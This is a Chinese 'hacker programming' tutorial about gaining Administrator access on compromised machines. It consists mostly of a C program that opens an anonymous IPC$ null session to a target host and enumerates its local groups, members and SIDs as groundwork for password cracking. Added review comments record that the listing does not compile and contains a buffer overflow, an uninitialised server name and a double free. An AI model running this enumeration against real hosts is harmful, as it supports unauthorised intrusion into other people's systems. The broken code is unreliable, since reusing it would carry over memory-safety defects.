  • 黑客编程教程(十二)取得系统用户权限

    我们要取得肉鸡的控制权，首先必须有 Administrator 权限。获得权限的途径很多，其中不少是通过 IPC$ 破解来获得用户密码。
     
    
    我们看一下代码:
    
     
    
    #include <windows.h>
    
    #include <stdio.h>
    
    #include <lm.h>
    
     
    
    #pragma comment (lib, "Mpr.lib")
    
    #pragma comment (lib, "Netapi32.lib")
    
     
    
    void getuser(char *);
    
     
    
    /*
     * Entry point.  Connects to \\<argv[1]>\ipc$ with an EMPTY user name and
     * password (an anonymous / "null" session), calls getuser() to print the
     * host's local groups and their members, then cancels the connection.
     * Exits 1 when no host argument is given or when either WNet call fails,
     * 0 otherwise.
     *
     * Review notes (defects left exactly as in the original listing):
     *  - `void main` is non-standard; it should be `int main` returning a status.
     *  - strncpy() with a length equal to sizeof server does not NUL-terminate
     *    when argv[1] is 100 bytes or longer, so `server` may be unterminated.
     *  - sprintf() writes "\\" + server + "\ipc$" into a 100-byte buffer from a
     *    server name that may itself be up to 99 bytes: the result can exceed
     *    `ipc` (unbounded write).  snprintf() with a length check is the
     *    bounded form.
     *  - The ipc$ format literal contains a stray `\i` escape and several
     *    format strings below are split across two lines where the `\n`
     *    escape was lost when the page was rendered; as pasted the listing
     *    does not compile.
     *  - NETRESOURCE NET is only partly filled in (four members); its other
     *    members are never set and hold whatever was on the stack.
     *  - NOTE(review): from a defender's view this is the classic anonymous
     *    IPC$ enumeration; current Windows releases restrict anonymous
     *    enumeration by default, so the hardening policy that blocks it is
     *    the item to audit on the systems you administer.
     */
    void main( int argc, char *argv[ ] )

    {            // empty user name and password

    DWORD ret;

    char username[100] = "", password[100] = "";

    char server[100] = "", ipc[100] = "";

    NETRESOURCE NET;   // only four fields are set below; the rest stay uninitialised



    if (argc == 1) 

    { 

    exit(1);   // no host argument supplied

    }



    strncpy(server,argv[1],100);   // may leave `server` without a terminating NUL

    // NOTE(review): the `\n` escape of this literal was lost in rendering; the
    // string is broken across two source lines and will not compile as-is.
    printf("server: %s
    ", server);



    sprintf(ipc,"\\%s\ipc$",server);   // unbounded; `\i` is not a valid escape (doubled backslashes lost)



    NET.lpLocalName = NULL;           // no local drive letter: a plain IPC connection

    NET.lpProvider = NULL;            // let the network provider be chosen automatically

    NET.dwType = RESOURCETYPE_ANY;

    NET.lpRemoteName = (char*)&ipc;   // "\\server\ipc$" built above



    printf("setting up session... ");

    // Password and user name are both "", i.e. an anonymous logon.
    ret = WNetAddConnection2(&NET,(const char *)&password,(const char *)&username,0);

                                                                              // establish a null session

    if (ret != ERROR_SUCCESS)

    {

    // NOTE(review): `\n` lost in rendering, literal split across lines.
    printf("IPC$ connect fail.
    ");

    exit(1);

    }

    else 

    // NOTE(review): `\n` lost in rendering, literal split across lines.
    printf("IPC$ connect success.
    ");

    getuser((char*)&server);   // enumerate local groups/members over the session



    printf("Disconnect Server... ");

    ret = WNetCancelConnection2((char*)&ipc,0,TRUE);                     // tear down the IPC connection (TRUE = force)

    if (ret != ERROR_SUCCESS)

    {

    // NOTE(review): `\n` lost in rendering, literal split across lines.
    printf("fail.
    ");

    exit(1);

    }

    else

    // NOTE(review): `\n` lost in rendering, literal split across lines.
    printf("success.
    ");

    exit (0);

    }
    
     
    
    /*
     * Enumerates the local groups of `server` (LOCALGROUP_INFO_1) and, for each
     * group, its members (LOCALGROUP_MEMBERS_INFO_2), printing the group name
     * and comment, then each member's domain\name, SID and SID usage.  Keeps
     * paging while NetLocalGroupEnum returns ERROR_MORE_DATA.
     *
     * Review notes (defects left exactly as in the original listing):
     *  - `wserver` is declared but never filled from `server`: both Net* calls
     *    read an uninitialised wchar_t array (undefined behaviour), so the
     *    `server` parameter is effectively ignored.
     *  - The inner `DWORD ret, read, total, resume` shadow the outer ones, but
     *    `buff` is NOT redeclared.  NetLocalGroupGetMembers overwrites the one
     *    `buff` pointer that the group list (`info`, outer) was taken from; the
     *    inner NetApiBufferFree releases the member buffer, and the final
     *    NetApiBufferFree(buff) after the loop frees that same pointer a second
     *    time (double free) while the original group buffer is leaked.
     *  - `lgrmi2_sid` is a PSID (pointer) printed with %d: the specifier does
     *    not match the argument (UB) and the output is an address, not a SID.
     *  - `i` is `int` in the outer loop but compared against DWORD `read`
     *    (signed/unsigned comparison); the inner loop redeclares `i` as
     *    `unsigned`, shadowing it.
     *  - A failed NetLocalGroupGetMembers `break`s out of the outer for loop,
     *    skipping the remaining groups of the current page rather than only
     *    the failing group.
     *  - Several format strings are split across lines where `\n` was lost in
     *    rendering; as pasted the code does not compile.
     */
    void getuser(char *server)                       // function that lists groups and their members

    {

    DWORD ret, read, total, resume = 0;

    int i;

    LPVOID buff;   // single pointer reused for BOTH enumerations (see notes above)

    char comment[255];

    wchar_t wserver[100];   // never initialised from `server` (UB when read below)



    do

    {

    // Level-1 group info; MAX_PREFERRED_LENGTH lets the API size the buffer.
    ret = NetLocalGroupEnum(wserver, 1, (unsigned char **)&buff, MAX_PREFERRED_LENGTH, &read, &total, &resume);



    if (ret != NERR_Success && ret != ERROR_MORE_DATA) 

    {

    // NOTE(review): `\n` lost in rendering, literal split across lines.
    printf("fail
    ");

    break;

    } 

    PLOCALGROUP_INFO_1 info = (PLOCALGROUP_INFO_1) buff;   // points into the buffer `buff` currently holds



    for (i=0; i<read; i++)   // signed `i` vs DWORD `read`

    {

    // NOTE(review): `\n` lost in rendering, literal split across lines.
    printf("GROUP: %S
    ",info[i].lgrpi1_name);



    // Convert the wide comment to the ANSI code page for %s output.
    WideCharToMultiByte(CP_ACP, 0, info[i].lgrpi1_comment , -1, comment,255,NULL,NULL); 

    // NOTE(review): `\n` lost in rendering, literal split across lines.
    printf("	COMMENT: %s
    ",comment);



    // Shadows the outer counters; `buff` is deliberately NOT redeclared here,
    // which is what clobbers the group-list pointer (see header notes).
    DWORD ret, read, total, resume = 0;

    // Level-2 member info for this group, into the SAME `buff` variable.
    ret = NetLocalGroupGetMembers((const unsigned short*)&wserver, info[i].lgrpi1_name, 2, (unsigned char **)&buff, 1024, &read, &total, &resume);



    if (ret != NERR_Success && ret != ERROR_MORE_DATA) 

    {

    // NOTE(review): `\n` lost in rendering, literal split across lines.
    printf("fail
    ");

    break;   // leaves the outer for loop, not just this group

    } 



    PLOCALGROUP_MEMBERS_INFO_2 info = (PLOCALGROUP_MEMBERS_INFO_2) buff;   // shadows the outer `info`



    for (unsigned i=0; i<read; i++)   // shadows the outer `i`

    {

    // NOTE(review): `\n` lost in rendering, literal split across lines.
    printf("		%S
    ", info[i].lgrmi2_domainandname);

    // %d applied to a PSID pointer: mismatched specifier, prints an address.
    printf("			SID:%d
    ", info[i].lgrmi2_sid);

    printf("			SIDUSAGE:%d
    ",info[i].lgrmi2_sidusage);

    }

    NetApiBufferFree (buff);   // frees the member buffer; `buff` still holds that freed pointer

    }



    NetApiBufferFree (buff);   // double free of the last member buffer; the group buffer is never freed



    } 

    while (ret == ERROR_MORE_DATA );   // outer `ret`: keep paging the group list

    }
  • 原文地址:https://www.cnblogs.com/rinack/p/3195656.html